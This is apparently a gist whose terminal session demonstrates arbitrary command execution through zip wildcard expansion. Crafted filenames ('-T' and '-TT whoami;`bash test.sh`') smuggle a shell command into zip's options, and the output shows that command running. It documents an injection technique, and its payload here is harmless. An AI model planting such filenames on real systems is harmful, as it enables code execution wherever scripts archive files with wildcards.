zip wildcard expansion arbitrary code execution

gistfile1.txt

[pablo:/tmp/expansion] $ ls -la
total 40916
drwxrwxr-x  2 pablo pablo     4096 feb 11 16:50 .
drwxrwxrwt 10 root  root  41885696 feb 11 16:50 ..
-rw-rw-r--  1 pablo pablo        0 feb 11 16:39 -T
-rwxrwxrwx  1 pablo pablo       24 feb 11 16:50 test.sh
-rw-rw-r--  1 pablo pablo        0 feb 11 16:40 -TT whoami;`bash test.sh`
[pablo:/tmp/expansion] $ cat test.sh
touch test.sh-was-run
[pablo:/tmp/expansion] $ zip test.zip *
  adding: test.sh (stored 0%)
pablo
sh: 1: ziRQINIr: not found
test of test.zip FAILED
zip error: Zip file invalid, could not spawn unzip, or wrong unzip (original files unmodified)
*** Error in `zip': double free or corruption (!prev): 0x000000000180f7b0 ***
[pablo:/tmp/expansion] 5 $ ls -la
total 40920
drwxrwxr-x  2 pablo pablo     4096 feb 11 16:50 .
drwxrwxrwt 10 root  root  41885696 feb 11 16:50 ..
-rw-rw-r--  1 pablo pablo        0 feb 11 16:39 -T
-rwxrwxrwx  1 pablo pablo       24 feb 11 16:50 test.sh
-rw-rw-r--  1 pablo pablo        0 feb 11 16:50 test.sh-was-run
-rw-rw-r--  1 pablo pablo        0 feb 11 16:40 -TT whoami;`bash test.sh`
-rw-------  1 pablo pablo      188 feb 11 16:50 ziRQINIr
[pablo:/tmp/expansion] $